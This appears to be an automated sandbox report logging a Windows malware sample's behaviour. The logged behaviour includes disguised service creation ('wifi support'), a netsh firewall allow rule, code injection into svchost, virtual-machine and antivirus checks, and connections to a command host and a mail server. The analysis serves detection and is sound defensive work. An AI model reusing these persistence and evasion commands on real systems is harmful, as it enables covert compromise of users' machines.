        Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\htdzdeug\
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qbxctmyn.exe" C:\Windows\SysWOW64\htdzdeug\
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create htdzdeug binPath= "C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d\"C:\Users\user\Desktop\file.exe\"" type= own start= auto DisplayName= "wifi support
        Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description htdzdeug "wifi internet conection
        Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start htdzdeug
        Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d"C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
        Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
        Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
        Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\htdzdeug\
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qbxctmyn.exe" C:\Windows\SysWOW64\htdzdeug\
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create htdzdeug binPath= "C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d\"C:\Users\user\Desktop\file.exe\"" type= own start= auto DisplayName= "wifi support
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description htdzdeug "wifi internet conection
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start htdzdeug
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\qbxctmyn.exe
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406A60 lstrcatA,CreateFileA,GetDiskFreeSpaceA,GetLastError,CloseHandle,CloseHandle,FindCloseChangeNotification,GetLastError,CloseHandle,DeleteFileA,GetLastError,0_2_00406A60
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9EA4 CreateToolhelp32Snapshot,Module32First,0_2_007B9EA4
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5036:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3176:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1500:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4952:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_01
        Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: C:\xidiw\reduhorulutufa\nidegiv_naxose.pdb source: file.exe, qbxctmyn.exe.0.dr
        Source: Binary string: WaaSMedicSvc.pdb source: waasmedic.20230208_040427_786.etl.22.dr
        Source: Binary string: *C:\xidiw\reduhorulutufa\nidegiv_naxose.pdb source: file.exe, qbxctmyn.exe.0.dr

        Data Obfuscation

        Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeUnpacked PE file: 17.2.qbxctmyn.exe.400000.0.unpack
        Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeUnpacked PE file: 17.2.qbxctmyn.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BD18C push 0000002Bh; iretd 0_2_007BD192
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr,0_2_00406069

        Persistence and Installation Behavior

        Source: unknownExecutable created and started: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe
        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\qbxctmyn.exe
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe (copy)
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe (copy)
        Source: C:\Windows\SysWOW64\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\htdzdeug
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create htdzdeug binPath= "C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d\"C:\Users\user\Desktop\file.exe\"" type= own start= auto DisplayName= "wifi support
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\SysWOW64\svchost.exeFile deleted: c:\users\user\desktop\file.exe
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00401000
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Users\user\Desktop\file.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX

        Malware Analysis System Evasion

        Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformation
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_17-15661
        Source: C:\Users\user\Desktop\file.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-15297
        Source: C:\Windows\SysWOW64\svchost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_23-6457
        Source: C:\Windows\SysWOW64\svchost.exe TID: 5100Thread sleep count: 93 > 30
        Source: C:\Windows\SysWOW64\svchost.exe TID: 5100Thread sleep time: -93000s >= -30000s
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_17-15014
        Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_23-7314
        Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-15280
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-14862
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_17-14655
        Source: C:\Users\user\Desktop\file.exeAPI coverage: 5.5 %
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeAPI coverage: 3.8 %
        Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-14832
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeEvaded block: after key decisiongraph_17-14625
        Source: C:\Windows\SysWOW64\svchost.exeEvaded block: after key decisiongraph_23-6127
        Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_23-7407
        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
        Source: C:\Windows\SysWOW64\svchost.exeCode function: inet_addr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetBestInterface,GetProcessHeap,HeapAlloc,GetAdaptersInfo,HeapReAlloc,GetAdaptersInfo,HeapFree,FreeLibrary,FreeLibrary,23_2_0012199C
        Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-15293
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeAPI call chain: ExitProcess graph end nodegraph_17-15025
        Source: svchost.exe, 00000014.00000002.531851789.0000027EFA7AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
        Source: svchost.exe, 00000014.00000002.531361159.0000027EF9E89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware820ES
        Source: svchost.exe, 00000014.00000002.531851789.0000027EFA7AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1
        Source: svchost.exe, 00000001.00000002.530944246.000001A573402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
        Source: svchost.exe, 00000014.00000002.531361159.0000027EF9E89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware8
        Source: svchost.exe, 00000001.00000002.531072410.000001A573428000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.531375972.0000028763264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.531173272.0000021B36029000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,0_2_00401D96
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406069 IsBadReadPtr,LoadLibraryA,GetProcAddress,GetProcAddress,IsBadReadPtr,0_2_00406069
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B9781 push dword ptr fs:[00000030h]0_2_007B9781
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0208092B mov eax, dword ptr fs:[00000030h]0_2_0208092B
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02080D90 mov eax, dword ptr fs:[00000030h]0_2_02080D90
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeCode function: 17_2_00E3092B mov eax, dword ptr fs:[00000030h]17_2_00E3092B
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeCode function: 17_2_00E30D90 mov eax, dword ptr fs:[00000030h]17_2_00E30D90
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EBCC GetProcessHeap,RtlAllocateHeap,0_2_0040EBCC
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,0_2_00409A6B
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeCode function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,17_2_00409A6B
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 23_2_00129A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,23_2_00129A6B

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Windows\SysWOW64\svchost.exeDomain query: svartalfheim.top
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 176.124.192.220 443
        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.47.54.36 25
        Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 120000 protect: page execute and read and write
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 120000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 120000
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3D6008
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\htdzdeug\
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qbxctmyn.exe" C:\Windows\SysWOW64\htdzdeug\
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create htdzdeug binPath= "C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d\"C:\Users\user\Desktop\file.exe\"" type= own start= auto DisplayName= "wifi support
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description htdzdeug "wifi internet conection
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start htdzdeug
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00406EDD
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,0_2_00407809
        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040EC54 GetSystemTimeAsFileTime,GetVolumeInformationA,GetTickCount,0_2_0040EC54
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B211 FileTimeToSystemTime,GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,SystemTimeToFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA,0_2_0040B211
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,0_2_00407809
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,0_2_0040405E
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409326 GetVersionExA,GetModuleHandleA,GetModuleFileNameA,wsprintfA,wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,0_2_00409326

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
        Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
        Source: svchost.exe, 00000014.00000002.531860154.0000027EFA7BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe
        Source: svchost.exe, 00000014.00000002.531813562.0000027EFA76C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
        Source: svchost.exe, 00000015.00000002.531091256.000002142EE29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.531270706.000002142EF02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

        Stealing of Sensitive Information

        Source: Yara matchFile source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPE
